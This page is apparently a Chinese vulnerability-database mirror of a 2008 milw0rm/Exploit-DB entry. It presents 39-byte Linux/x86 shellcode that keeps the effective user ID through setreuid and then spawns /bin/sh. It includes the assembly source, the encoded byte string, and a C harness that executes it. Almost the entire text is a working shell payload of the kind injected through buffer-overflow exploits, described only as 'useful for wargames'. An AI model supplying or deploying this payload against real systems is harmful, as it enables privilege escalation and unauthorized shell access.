Linux/x86 - setreuid(geteuid, geteuid) + execve(/bin/sh) Shellcode (39 bytes)

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1056800 漏洞类型
发布时间 2008-08-19 更新时间 2008-08-19
CVE编号 N/A CNNVD-ID N/A
漏洞平台 Linux_x86 CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/13338
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*

setreuid(geteuid, geteuid) + execve(/bin/sh) shellcode - useful for wargames and the like.

global _start

section .text
_start:
        ; geteuid
        push byte 49
        pop eax
        int 0x80

        ; setreuid
        mov ebx, eax
        mov ecx, eax
        push byte 70
        pop eax
        int 0x80

        ; execve
        xor eax,eax
        push eax
        push 0x68732f2f
        push 0x6e69622f
        push esp
        pop ebx
        push eax
        push ebx
        mov ecx, esp
        xor edx, edx
        mov byte al,11
        int 0x80
*/

main() {
        char shellcode[] = "\x6a\x31\x58\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\x31\xc0\x50"
			   "\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x54\x5b\x50\x53\x89\xe1\x31"
                           "\xd2\xb0\x0b\xcd\x80";

        (*(void (*)()) shellcode)();
}

// milw0rm.com [2008-08-19]